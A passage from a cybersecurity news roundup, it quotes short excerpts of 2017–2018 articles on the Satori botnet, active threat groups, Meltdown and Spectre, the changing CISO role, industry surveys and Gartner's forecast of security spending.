A new IoT botnet called Satori is spreading more slowly than Mirai did -- it's compromised about 40,000 devices so far -- but it's mutating a lot faster than Mirai ever did, with regular infusions of code designed to exploit new vulnerabilities. Security researchers fear that a Mirai-alike botnet with a competent patching regime could be far more devastating than Mirai ever was."

Lazarus Group, Fancy Bear Most Active Threat Groups in 2017

DARK Reading article, January 31st, 2018

"The busiest threat actor groups of 2017 were Sofacy (otherwise known as Fancy Bear or APT28) and the Lazarus Group, security experts report. As these groups ramped up activity, threat actors operating out of China became quiet.

Analysts at AlienVault leveraged data from its Open Threat Exchange (OTX) threat intelligence sharing platform to take a broad look at threat patterns from last year. They found the most frequently referenced threat group in 2017 was Sofacy.

The second most active group was Lazarus, which is believed to operate out of North Korea (or Democratic People's Republic of Korea, DPRK)."

Securing IoT Devices and Traffic between IoT Sensors and Cloud Analytics

IIoT World article, January 24th, 2018

"It is well documented that IoT devices have introduced new security risks. Most IoT devices must interface to cloud-based management and analytics engines and therefore support a TCP/IP stack for this communication. Our IoT endpoint software is designed to augment a device’s TCP/IP stack with very little overhead, providing authentication to the cloud services.

Informational components are all about the sensors. Sensors have a calibration that provides information within specific tolerances providing known levels of data fidelity. Sensors may produce different information at different tolerance levels, but the receiving analytic system must know what tolerance to apply to each reported measurement. This enables the sensors to provide the necessary input for bounded operation."

Changing Role of the CISO

McAfee blog, January 4th, 2018

With the growth of the digital world, we have seen growth in cyberthreats. These range from the annoying to the downright catastrophic. And as these threats evolve and permutate, we have also seen the evolution of a formerly overlooked player: the Chief Information Security Officer, or CISO.

Not only is the CISO’s role changing, but so is his/her relationship to the organization they work in. Where once many reported to the Chief Information Officer (CIO), many now report directly to the CEO or the Board. In their new role, the CISOs also need new skills.

Meltdown and Spectre CPU Flaws Affect Intel, ARM, AMD Processors

Article in The Hacker News, January 3rd, 2018

Unlike the initial reports suggested about Intel chips being vulnerable to some severe ‘memory leaking’ flaws, full technical details about the vulnerabilities have now emerged, which revealed that almost every modern processor since 1995 is vulnerable to the issues.

Disclosed today by Google Project Zero, the vulnerabilities potentially impact all major CPUs, including those from AMD, ARM, and Intel—threatening almost all PCs, laptops, tablets, and smartphones, regardless of manufacturer or operating system.

The Disconnect Between Cybersecurity & the C-Suite

Dark Reading article, December 28th, 2017

Despite all the attention that massive hacks and other breaches have attracted in recent years, organizations everywhere still struggle to comprehend the scale of and manage emerging cyber-risks. Of the more than 9,500 senior executives in 122 countries who participated in PricewaterhouseCoopers' Global State of Information Security Survey (GSISS) 2018, only 39% say they are very confident in their attribution capabilities — that is, their ability to detect and trace cyberattacks.

As highlighted in the GSISS report, US infrastructure is still susceptible to what the World Economic Forum (WEF) deems in its Global Risk Report 2017 as the prime business risk in North America: "large-scale cyber-attacks or malware causing large economic damages, geopolitical tensions, or widespread loss of trust in the internet."

Honeywell Survey reveals that 45% of industrial companies don’t have cybersecurity leader

CISO Magazine article, December 11th, 2017

A recent survey conducted by a software industrial company indicated that a number of industrial companies are not taking cybersecurity seriously enough. The “Putting Industrial Cyber Security at the Top of the CEO Agenda” survey, which was conducted by Honeywell in collaboration with LNS Research, included responses from 130 strategic decision makers from industrial companies across North America, Europe, and other parts of the globe.

Forty-five percent of the respondents agreed that their organization lacks a reliable enterprise leader for cybersecurity. Forty percent have a chief of cybersecurity while 15% plan to get a cybersecurity lead in charge within the next year. When it comes to the companies’ manufacturing plants, only 35% of the organizations have an established role for cybersecurity.

ESG's Jon Oltsik: 3 Advanced Prevention Technologies Expected to Grow in 2018

CSO Magazine article, December 8th, 2017

Oltsik believes 'advanced prevention' sits at the intersection of two other cybersecurity trends:

  • Software-defined security functionality. Software-defined everything makes it easier to deploy, configure, and scale security controls.
  • Artificial intelligence. AI uses algorithms to comb through mountains of data to increase detection/blocking efficacy, provide granular risk scoring, and fine-tune decision making.

In the past, many security controls were based upon rules/heuristics and often required ample time for deployment, configuration, customization, etc. When the two advanced prevention trends come together, they produce security controls that are easier to deploy, easier to operate, and offer more accurate detection/blocking rates. Thus, organizations can deploy advanced prevention controls, decrease the attack surface, reduce security noise, and focus precious human resources on high-value tasks.

Gartner Forecasts Worldwide Security Spending Will Reach $96 Billion in 2018, Up 8 Percent from 2017

Gartner Press Release, December 7th, 2017

Gartner, Inc. forecasts worldwide enterprise security spending to total $96.3 billion in 2018, an increase of 8 percent from 2017. Organizations are spending more on security as a result of regulations, shifting buyer mindset, awareness of emerging threats and the evolution to a digital business strategy.

"Overall, a large portion of security spending is driven by an organization's reaction toward security breaches as more high profile cyberattacks and data breaches affect organizations worldwide," said Ruggero Contu, research director at Gartner. "Cyberattacks such as WannaCry and NotPetya, and most recently the Equifax breach, have a direct effect on security spend, because these types of attacks last up to three years."

This is validated by Gartner's 2016 security buying behavior survey*. Of the 53 percent of organizations that cited security risks as the No. 1 driver for overall security spending, the highest percentage of respondents said that a security breach is the main security risk influencing their security spending.